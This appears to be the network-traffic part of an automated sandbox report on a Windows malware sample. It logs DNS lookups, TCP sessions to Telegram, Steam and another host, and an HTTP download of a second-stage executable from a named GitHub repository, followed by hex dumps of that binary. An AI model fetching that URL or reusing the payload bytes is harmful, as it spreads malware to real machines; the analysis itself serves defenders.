                                                                                                                                                                                                                    Dec 23, 2024 09:02:27.829938889 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:27.829971075 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.192104101 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.192264080 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.192796946 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.192827940 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.194694042 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.194730043 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737186909 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737220049 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737299919 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737346888 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737428904 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737507105 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737632990 CET49952443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.737664938 CET44349952149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.762892962 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.762932062 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.763021946 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.763262033 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:29.763273954 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.143450022 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.143542051 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.147228003 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.147233009 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.147491932 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.147546053 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.148027897 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.191323042 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.993381977 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.993453026 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.993493080 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.993494034 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.993519068 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.993551016 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:31.993583918 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.109350920 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.109384060 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.109416008 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.109427929 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.109442949 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.109457970 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.117182970 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.117252111 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.117264032 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.117286921 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.117297888 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.117333889 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.117513895 CET49958443192.168.2.4104.102.49.254
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.117530107 CET44349958104.102.49.254192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.158862114 CET49964443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.158916950 CET4434996437.27.43.98192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.159010887 CET49964443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.159468889 CET49964443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:02:32.159485102 CET4434996437.27.43.98192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:04.237595081 CET49964443192.168.2.437.27.43.98
                                                                                                                                                                                                                    Dec 23, 2024 09:03:04.238982916 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:04.239053011 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:04.239144087 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:04.239382029 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:04.239398956 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:05.600368023 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:05.600431919 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:05.875339031 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:05.875369072 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:05.916120052 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:05.916136980 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.337898016 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.337929010 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.337968111 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.337980986 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.338001013 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.338011980 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.338018894 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.338129997 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.339431047 CET50013443192.168.2.4149.154.167.99
                                                                                                                                                                                                                    Dec 23, 2024 09:03:06.339451075 CET44350013149.154.167.99192.168.2.4
                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Dec 23, 2024 09:01:07.199862003 CET5225953192.168.2.41.1.1.1
                                                                                                                                                                                                                    Dec 23, 2024 09:01:07.337776899 CET53522591.1.1.1192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.467531919 CET6548453192.168.2.41.1.1.1
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.604655981 CET53654841.1.1.1192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:14.429311991 CET6220753192.168.2.41.1.1.1
                                                                                                                                                                                                                    Dec 23, 2024 09:01:14.566379070 CET53622071.1.1.1192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:16.507158041 CET5096353192.168.2.41.1.1.1
                                                                                                                                                                                                                    Dec 23, 2024 09:01:16.646045923 CET53509631.1.1.1192.168.2.4
                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Dec 23, 2024 09:01:07.199862003 CET192.168.2.41.1.1.10x4530Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.467531919 CET192.168.2.41.1.1.10xf5d0Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 23, 2024 09:01:14.429311991 CET192.168.2.41.1.1.10xd6e2Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 23, 2024 09:01:16.507158041 CET192.168.2.41.1.1.10xf0d0Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Dec 23, 2024 09:01:07.337776899 CET1.1.1.1192.168.2.40x4530No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.604655981 CET1.1.1.1192.168.2.40xf5d0No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.604655981 CET1.1.1.1192.168.2.40xf5d0No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.604655981 CET1.1.1.1192.168.2.40xf5d0No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.604655981 CET1.1.1.1192.168.2.40xf5d0No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 23, 2024 09:01:14.566379070 CET1.1.1.1192.168.2.40xd6e2No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Dec 23, 2024 09:01:16.646045923 CET1.1.1.1192.168.2.40xf0d0No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    • github.com
                                                                                                                                                                                                                    • raw.githubusercontent.com
                                                                                                                                                                                                                    • t.me
                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.44977220.233.83.1454437424C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-23 08:01:09 UTC114OUTGET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
                                                                                                                                                                                                                    Host: github.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2024-12-23 08:01:10 UTC565INHTTP/1.1 302 Found
                                                                                                                                                                                                                    Server: GitHub.com
                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 08:01:10 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                    Access-Control-Allow-Origin:
                                                                                                                                                                                                                    Location: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                    2024-12-23 08:01:10 UTC3390INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                                                                                                                                                                                                    2024-12-23 08:01:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.449778185.199.109.1334437424C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-23 08:01:11 UTC125OUTGET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
                                                                                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC903INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Length: 476160
                                                                                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    ETag: "fab0c349a347a91ca7e8afd2bad974668e7a1ce50c0b2f5ed6f73ab561c31a75"
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                    X-GitHub-Request-Id: 2C05:14CB39:1A23151:1D72A5D:676918C7
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 08:01:12 GMT
                                                                                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                                                                                    X-Served-By: cache-ewr-kewr1740026-EWR
                                                                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                                                                                    X-Timer: S1734940872.101090,VS0,VE78
                                                                                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                    X-Fastly-Request-ID: dde14fb065305dce11382898a37d851b5201586a
                                                                                                                                                                                                                    Expires: Mon, 23 Dec 2024 08:06:12 GMT
                                                                                                                                                                                                                    Source-Age: 0
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 95 8b 4d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a8 04 00 00 98 02 00 00 00 00 00 93 e8 03 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 28 00 00 04 00 00 00 00 00 00 02 00 00 82 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 a8 05 00 f0 00 00
                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELMg@(H
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: 44 00 89 e6 0f 11 06 a1 dc c5 45 00 b9 ab 24 eb c5 03 88 85 78 7d d7 6a 01 56 ff d1 8b 46 08 8b 0d e0 c5 45 00 c1 e8 1f ba db f3 54 f1 03 94 81 85 78 7d d7 ff e2 31 c0 40 eb 02 31 c0 83 c4 10 5e c3 56 83 ec 24 a1 e4 c5 45 00 89 e6 56 ff 90 32 6d 22 c7 31 c0 83 7e 14 02 0f 92 c0 8b 0d e8 c5 45 00 ba ba d2 36 9d 03 94 81 32 6d 22 c7 ff e2 a1 ec c5 45 00 6a 00 ff 90 32 6d 22 c7 83 c4 24 5e c3 55 53 57 56 83 ec 20 a1 f0 c5 45 00 be c7 5a 07 33 8b 80 f4 bd 52 92 01 f0 89 e5 6a 01 55 ff d0 31 c0 83 7d 08 00 b9 0c 00 00 00 0f 48 c8 a1 f4 c5 45 00 ba e1 0e 3f 1a 03 94 08 f4 bd 52 92 ff e2 a1 f0 c5 45 00 8b 80 f4 bd 52 92 01 f0 68 00 00 00 40 55 ff d0 bf 04 00 00 00 01 fd a1 f0 c5 45 00 8b 80 f8 bd 52 92 01 f0 8d 5c 24 13 57 55 53 ff d0 8d 04 3b 8b 0d f0 c5 45 00
                                                                                                                                                                                                                    Data Ascii: DE$x}jVFETx}1@1^V$EV2m"1~E62m"Ej2m"$^USWV EZ3RjU1}HE?RERh@UER\$WUS;E
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: a1 30 00 00 00 8b 78 0c 83 c7 14 a1 60 c6 45 00 8b 1f 31 c9 39 fb 0f 94 c1 bd 88 db 1e b6 8b 8c 88 eb da ea 57 01 e9 31 c0 ff e1 b8 cb 3b 16 40 03 05 98 c2 45 00 56 ff 73 28 ff d0 8b 0d 60 c6 45 00 8d 51 0c 85 c0 0f 45 d1 8b 92 e7 da ea 57 01 ea b0 01 ff e2 8b 1b 31 c0 39 fb 0f 94 c0 ba 88 db 1e b6 03 94 81 eb da ea 57 31 c0 ff e2 5e 5f 5b 5d c2 04 00 57 56 a1 70 c6 45 00 be a5 46 08 98 8b 80 5f ce 0e 41 01 f0 68 4c a6 45 00 ff d0 84 c0 b8 4c 00 00 00 b9 38 00 00 00 0f 45 c8 a1 78 c6 45 00 bf 95 53 56 c9 8b 84 08 5f ce 0e 41 01 f8 ff e0 a1 70 c6 45 00 03 b0 5f ce 0e 41 68 f6 a6 45 00 ff d6 34 01 0f b6 c0 c1 e0 05 8b 0d 78 c6 45 00 03 bc 01 63 ce 0e 41 ff e7 a1 70 c6 45 00 be a5 46 08 98 8b 80 5f ce 0e 41 01 f0 68 7e a6 45 00 ff d0 84 c0 b8 10 00 00 00 b9
                                                                                                                                                                                                                    Data Ascii: 0x`E19W1;@EVs(`EQEW19W1^_[]WVpEF_AhLEL8ExESV_ApE_AhE4xEcApEF_Ah~E
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: ba ff ff 0f 00 52 6a 08 50 ff d1 89 7c 24 10 89 c7 a1 04 c3 45 00 01 e8 53 ff d0 83 c4 04 8b 0d 08 c3 45 00 01 e9 50 ff d1 83 c4 04 a1 0c c3 45 00 01 e8 ff d0 89 c1 ba 81 80 80 80 f7 ea 01 ca 89 d0 c1 e8 1f c1 fa 07 01 c2 89 d0 c1 e0 08 29 c2 01 ca b8 ff ff 0f 00 50 52 57 e8 8a 98 04 00 83 c4 0c 03 2d 10 c3 45 00 8d 44 24 08 53 50 b8 ff ff 0f 00 50 89 7c 24 0c 57 8b 7c 24 20 57 ff d5 31 c9 85 c0 0f 94 c1 c1 e1 04 a1 b8 c6 45 00 03 b4 08 51 77 23 00 ff e6 8d 48 3c 83 c0 30 81 7c 24 08 ff ff 0f 00 0f 45 c1 bd 3c e6 e1 fd 8b 80 29 77 23 00 01 e8 31 db ff e0 68 ff ff 0f 00 53 ff 74 24 08 e8 20 98 04 00 83 c4 0c 89 f9 bf b6 9d 66 6c a1 14 c3 45 00 01 f8 51 ff d0 a1 f8 c2 45 00 01 f8 83 ec 1c 89 5c 24 18 0f 28 05 50 c8 44 00 0f 11 44 24 04 8d 4c 24 30 89 0c 24
                                                                                                                                                                                                                    Data Ascii: RjP|$ESEPE)PRW-ED$SPP|$W|$ W1EQw#H<0|$E<)w#1hSt$ flEQE\$(PDD$L$0$
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: 07 32 51 20 88 50 07 0f b6 51 08 32 51 21 88 50 08 c6 05 ff ac 46 00 01 c3 cc cc cc 55 53 57 56 83 ec 08 8b 5c 24 1c 8b 6c 24 20 c7 44 24 04 ff 00 00 00 a1 b0 cb 45 00 8b b0 60 9e 0f 4b a1 b4 cb 45 00 ff 90 60 9e 0f 4b 31 ff 68 04 01 00 00 57 50 ff d6 89 c6 a1 b8 cb 45 00 89 e1 51 68 19 01 02 00 57 55 53 ff 90 60 9e 0f 4b 31 c9 85 c0 0f 95 c1 a1 bc cb 45 00 ba db 25 26 cd 03 94 88 60 9e 0f 4b ff e2 a1 c0 cb 45 00 8d 4c 24 04 51 56 57 57 ff 74 24 34 ff 74 24 14 ff 90 60 9e 0f 4b a1 c4 cb 45 00 ff 34 24 ff 90 60 9e 0f 4b 89 f0 83 c4 08 5e 5f 5b 5d c2 0c 00 55 89 e5 53 57 56 81 ec 54 04 00 00 8d 9d a0 fb ff ff 68 e8 03 00 00 6a 00 53 e8 ae 92 04 00 83 c4 0c a1 d0 cb 45 00 8b 80 1c f8 1a a6 89 45 f0 a1 d4 cb 45 00 be d1 52 71 f3 8b 80 1c f8 1a a6 01 f0 b9 f8
                                                                                                                                                                                                                    Data Ascii: 2Q PQ2Q!PFUSWV\$l$ D$E`KE`K1hWPEQhWUS`K1E%&`KEL$QVWWt$4t$`KE4$`K^_[]USWVThjSEEERq
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: 8d 4e 2c 8d 47 2c 8b 15 0c cc 45 00 03 9a a6 06 30 4f 50 ff d3 0f 10 47 38 0f 10 4f 48 0f 11 46 38 0f 11 4e 48 0f 10 47 58 0f 11 46 58 89 f0 5e 5f 5b c2 04 00 cc 57 56 89 ce 83 c1 2c a1 10 cc 45 00 bf aa 2e cf 6a 8b 80 54 04 99 c4 01 f8 ff d0 8d 4e 18 a1 10 cc 45 00 8b 80 54 04 99 c4 01 f8 ff d0 8d 4e 0c a1 10 cc 45 00 8b 80 54 04 99 c4 01 f8 ff d0 a1 10 cc 45 00 ba aa 2e cf 6a 03 90 54 04 99 c4 89 f1 5e 5f ff e2 55 89 e5 53 57 56 81 ec 2c 03 00 00 8d 5d 20 a1 20 cc 45 00 be 07 26 05 59 8b 80 3f 62 fc 4c 01 f0 bf 0c a6 45 00 8d 4d 98 57 ff d0 a1 20 cc 45 00 8b 80 3f 62 fc 4c 01 f0 8d 4d 88 57 ff d0 8b 43 78 83 f8 02 0f 84 a4 00 00 00 83 f8 01 0f 84 44 02 00 00 85 c0 0f 85 03 01 00 00 a1 20 cc 45 00 8b 80 43 62 fc 4c 01 f0 8d 8d 08 fe ff ff 6a 1c 51 ff d0
                                                                                                                                                                                                                    Data Ascii: N,G,E0OPG8OHF8NHGXFX^_[WV,E.jTNETNETE.jT^_USWV,] E&Y?bLEMW E?bLMWCxD ECbLjQ
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: b9 40 00 00 00 0f 44 c8 a1 28 cc 45 00 8b 84 08 3f 62 fc 4c b9 40 48 d5 1b 01 c8 ff e0 a1 3c cc 45 00 8b 98 3f 62 fc 4c a1 20 cc 45 00 bf 07 26 05 59 8b 80 67 62 fc 4c 01 f8 b9 92 69 fc 4c 03 0d 2c cc 45 00 be b6 ad 46 00 51 56 ff d0 83 c4 08 56 8d 85 f4 fc ff ff 50 ff d3 85 c0 b8 14 00 00 00 b9 58 00 00 00 0f 44 c8 a1 28 cc 45 00 bb 40 48 d5 1b 8b 84 08 3f 62 fc 4c 01 d8 ff e0 a1 20 cc 45 00 03 b8 3f 62 fc 4c 8d 4d b4 68 0c a6 45 00 ff d7 8d 75 08 83 7e 24 00 b8 48 00 00 00 b9 60 00 00 00 0f 44 c8 a1 28 cc 45 00 03 9c 08 3f 62 fc 4c ff e3 a1 20 cc 45 00 be 07 26 05 59 8b 80 47 62 fc 4c 01 f0 8d bd 7c ff ff ff 8d 4d b4 8d 55 98 52 57 ff d0 a1 20 cc 45 00 8b 80 53 62 fc 4c 01 f0 ba ea 68 fc 4c 8b 0d 2c cc 45 00 01 d1 bb aa ad 46 00 51 53 ff d0 83 c4 08 a1
                                                                                                                                                                                                                    Data Ascii: @D(E?bL@H<E?bL E&YgbLiL,EFQVVPXD(E@H?bL E?bLMhEu~$H`D(E?bL E&YGbL|MURW ESbLhL,EFQS
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: 01 d8 89 f9 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 4d a4 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 8d 7c ff ff ff ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 8d 54 ff ff ff ff d0 a1 50 cc 45 00 8b b8 3f 62 fc 4c a1 20 cc 45 00 8b 80 5f 62 fc 4c 01 d8 8d 4d c4 ff d0 89 c6 a1 20 cc 45 00 8b 80 5f 62 fc 4c 01 d8 8d 4d b4 ff d0 6a 01 56 50 ff d7 89 e7 83 ec 14 89 e6 a1 20 cc 45 00 8b 80 6b 62 fc 4c 01 d8 89 f1 8d 55 c4 52 ff d0 8d 45 d0 89 46 0c 8d 45 a4 89 46 10 a1 20 cc 45 00 8b 80 77 62 fc 4c 01 d8 ff d0 89 fc 85 c0 b8 2c 00 00 00 b9 44 00 00 00 0f 44 c8 a1 28 cc 45 00 ba 40 48 d5 1b 03 94 08 3f 62 fc 4c ff e2 89 65 b0 50 83 ec 7c 89 e7 8b 45 a4 89 85 78 ff ff ff 8b 75 d0 8d 4f 6c a1 20 cc 45 00 8b 80 6b 62 fc 4c 01 d8 8d 55 e8 52 ff d0
                                                                                                                                                                                                                    Data Ascii: EObLM EObL| EObLTPE?bL E_bLM E_bLMjVP EkbLUREFEF EwbL,DD(E@H?bLeP|ExuOl EkbLUR
